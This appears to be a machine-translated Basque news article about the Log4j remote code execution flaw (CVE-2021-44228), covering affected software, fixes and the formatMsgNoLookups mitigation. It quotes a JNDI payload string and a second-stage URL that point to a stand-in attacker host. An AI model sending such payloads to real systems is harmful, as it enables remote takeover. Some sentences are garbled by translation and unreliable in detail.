Apache Log4j-en, Java aplikazioetako erregistroa antolatzeko esparru ezagun batean, ahultasun kritiko bat identifikatu da, kode arbitrarioa exekutatzeko aukera ematen duena erregistroan "{jndi:URL}" formatuan bereziki formateatutako balio bat idazten denean. Erasoa kanpoko iturrietatik jasotako balioak erregistratzen dituzten Java aplikazioetan egin daiteke, adibidez, errore-mezuetan balio problematikoak bistaratzen direnean.
Kontuan izan da Apache Struts, Apache Solr, Apache Druid edo Apache Flink bezalako frameworkak erabiltzen dituzten ia proiektu guztiek arazoaren eragina dutela, Steam, Apple iCloud, Minecraft bezeroak eta zerbitzariak barne. Zaurgarritasunak aplikazio korporatiboen aurkako eraso masiboak eragin ditzakeela espero da, Apache Struts esparruko ahultasun kritikoen historia errepikatuz, zeina, gutxi gorabehera, Fortune-ren %65ek web aplikazioetan erabiltzen duena. 100 enpresa, sarea eskaneatzeko saiakerak barne.
Arazoa areagotu egiten da dagoeneko lan-explotazio bat argitaratu izanak, baina adar egonkorren konponketak oraindik ez dira bildu. CVE identifikatzailea ez da oraindik esleitu. Konponketa log4j-2.15.0-rc1 proba-adarrean bakarrik sartzen da. Ahultasuna blokeatzeko konponbide gisa, log4j2.formatMsgNoLookups parametroa true gisa ezartzea gomendatzen da.
Arazoa log4j-k "{}" maskara bereziak prozesatzea onartzen duelako sortu zen erregistrora irteerako lerroetan, zeinetan JNDI (Java Naming and Directory Interface) kontsultak exekutatu ahal izateko. Erasoa "${jndi:ldap://attacker.com/a}" ordezkapena duen kate bat pasatzean datza, log4j-k prozesatzen duenean zeinek Java klaserako biderako LDAP eskaera bidaliko dion attacker.com zerbitzariari. . Erasotzailearen zerbitzariak itzultzen duen bidea (adibidez, http://second-stage.attacker.com/Exploit.class) uneko prozesuaren testuinguruan kargatu eta exekutatuko da, erasotzaileak kode arbitrarioa exekutatzeko aukera ematen diona. egungo aplikazioaren eskubideekin sistema.
1. gehigarria: ahultasunari CVE-2021-44228 identifikatzailea esleitu zaio.
2. gehigarria: log4j-2.15.0-rc1 bertsioak gehitutako babesa saihesteko modu bat identifikatu da. Eguneratze berri bat, log4j-2.15.0-rc2, ahultasunaren aurkako babes osoagoarekin proposatu da. Kodeak gaizki formateatutako JNDI URL bat erabiltzearen kasuan, amaiera anormalik ezarekin lotutako aldaketa nabarmentzen du.
Iturria: opennet.ru